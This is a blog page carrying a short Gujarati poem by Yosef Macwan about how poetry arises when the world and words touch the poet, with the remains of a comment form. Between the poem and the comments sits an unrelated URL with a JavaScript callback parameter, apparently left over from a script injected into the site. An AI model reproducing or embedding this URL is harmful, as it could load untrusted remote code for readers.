કવિતાની પ્રક્રિયા – યોસેફ મેકવાન

.

જગત મને સ્પર્શે છે

ત્યારે…

કવિતા રચાય છે

હું

જગતને સ્પર્શું છું

ત્યારે જમાનો કરવટ બદલે છે !

હું

શબ્દોને સ્પર્શું છું

ત્યારે શબ્દો મૂંઝાય છે

પણ

શબ્દો મને સ્પર્શે છે ત્યારે

હું

કલકલું છું

મને વિસ્મયની ક્ષણો ફૂટે છે

ત્યારે હું ક્ષણમાં નથી હોતો..

હું જગતની છવિ ખેંચતો હોઉં છું…

અને પછી-એમ જ-

જગત મને સ્પર્શે છે…

ત્યારે હું હું બની જાઉં છું…

 .

( યોસેફ મેકવાન )

 

http://loading-resource.com/data.geo.php?callback=window.__geo.getData

3 thoughts on “કવિતાની પ્રક્રિયા – યોસેફ મેકવાન

Leave a reply to જીવન કલા વિકાસ(વિકાસ કૈલા) Cancel reply